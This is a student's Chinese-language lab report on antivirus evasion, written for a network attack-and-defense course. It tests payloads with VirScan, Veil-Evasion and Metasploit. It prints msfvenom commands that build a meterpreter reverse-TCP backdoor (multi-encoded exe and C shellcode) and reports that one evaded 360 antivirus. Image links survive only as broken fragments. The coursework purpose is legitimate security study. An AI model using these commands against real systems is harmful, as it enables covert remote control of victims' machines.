20155235 《网络攻防》 实验三 免杀原理与实践 实验报告

本文详细记录了网络攻防实验过程,包括后门检测、编码器使用、C语言调用Shellcode等内容。实验中,作者利用多种工具和技术手段,如VirScan、Msfvenom、Veil-Evasion等,对恶意软件进行免杀处理并验证其效果。

20155235 《网络攻防》 实验三 免杀原理与实践 实验报告

实验目的

通过本部分内容的学习,认识到杀软局限性,提高在工作生活中对于恶意软件防范能力。

实验内容

(1)用VirScan来检测后门

(2)Msfvenom使用编码器

(3)Veil-Evasion

(4)C语言调用Shellcode

实验一 用VirScan来检测后门

按理说检查的应该是实验二生成的后门,但是,我用VirScan检验后门时,出现了一个让我意想不到的情况
dDMBAAAAAAAA&bo=PALcAAAAAAADB8A!&rf=viewer_4
让我十分的震惊了

任务二 Msfvenom使用编码器

重复编码,输入
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=[本机IP] LPORT=5235 -f exe > 5235Backdoor.exe
结果一样,内心崩溃。

任务三 Veil-Evasion

安装Veil-Evasion
因为我的虚拟机不能直接通过sudo apt-get install 安装,所以我参考了一下周泽堃同学第三次实验博客中关于Veil-Evasion的安装方法,然而,也失败了,最后经过了一番波折,我最终选择,拷贝了其他同学下好的Veil-Evasion。
使用Veil-Evasion
输入veil ,用use evasionlist payloads ,进入到payloads模板界面,经过一番操作后,成功生成
dDMBAAAAAAAA&bo=1ANDAgAAAAADN4Q!&rf=viewer_4

任务四 C语言调用Shellcode

输入msfvenom -p windows/meterpreter/reverse_tcp LHOST=[kali IP] LPORT=5235 -f c 生成C语言代码,C语言代码就不贴了
回连监听
dPMAAAAAAAAA&bo=VgPgAQAAAAADN6Y!&rf=viewer_4
用 VirScan检测,结果为dAQBAAAAAAAA&bo=*gLxAAAAAAADFz8!&rf=viewer_4

经过5次重复编译后,用VirScan检测结果为
dAgBAAAAAAAA&bo=YQIfAQAAAAADF08!&rf=viewer_4

后记

实验成功真是可喜可贺,比较开心的是最后shellcode生成的C语言代码,无论是编译1次还是编译5次,奇虎360都没有检测出来,这让我无比的开心。但是我博客交的有些晚了,对不起老师!

转载于:https://www.cnblogs.com/WYjingheng/p/8799620.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值